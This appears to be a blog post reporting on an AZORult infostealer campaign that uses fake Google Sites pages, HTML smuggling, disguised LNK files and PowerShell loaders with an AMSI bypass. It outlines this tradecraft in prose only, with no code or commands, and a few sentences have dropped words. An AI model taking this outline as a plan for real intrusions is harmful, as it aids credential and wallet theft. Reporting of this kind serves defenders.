Skip to content Skip to footer

New Malware Campaign Uses Fake Google Sites and HTML Smuggling for AZORult Distribution

A recent report from cybersecurity researchers revealed the discovery of a new malware campaign that uses fake Sites pages and HTML smuggling to propagate a commercial malware called AZORult. The campaign, not attributed to any specific threat actor or group, is designed to collect sensitive data for selling on underground forums.

According to Netskope Threat Labs researcher Jan Michael Alcantara, the campaign uses an unconventional HTML smuggling technique, where the malicious payload is concealed within a separate JSON file hosted on an external website. The method is a stealthy way of exploiting legitimate HTML5 and JavaScript features to assemble and launch the malware by “smuggling” an encoded malicious . This allows the malware to bypass typical security controls, such as email gateways, which only inspect for suspicious attachments.

Once installed, AZORult, also known as PuffStealer and Ruzalto, can steal credentials, cookies, and browsing history from browsers, take screenshots, and extract data from 137 cryptocurrency wallets. The latest attack activity involves the threat actor creating fake Docs pages on Sites that use HTML smuggling to deliver the payload.

The threat actor adds a CAPTCHA barrier to make the fake Docs page appear more legitimate. He provides an additional layer of protection against URL scanners. The downloaded file is a shortcut file (.LNK) that seems to be a bank statement. However, when opened, it executes a series of intermediate batch and PowerShell scripts from a compromised domain.

One of the PowerShell scripts, called “agent3.ps1,” is responsible for fetching the AZORult loader (“service.exe”), which then downloads and executes another PowerShell script (“sd2.ps1”) containing the actual AZORult malware. This fileless infostealer uses reflective code loading to evade detection and an AMSI bypass technique to avoid being detected by host-based anti-malware products, including Defender.

In conclusion, this new AZORult campaign is a highly sophisticated and attempt to distribute malware and steal sensitive information. The threat actor can bypass traditional security measures and infect devices using HTML smuggling and other techniques. Individuals and organizations must remain vigilant and cautious when opening emails or clicking on links from unknown sources to avoid falling victim to such attacks.

Leave a comment

Newsletter Signup
Address

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

Look, you wanna be elite? You have to do a righteous hack.Phreak

Deitasoft © 2024. All Rights Reserved.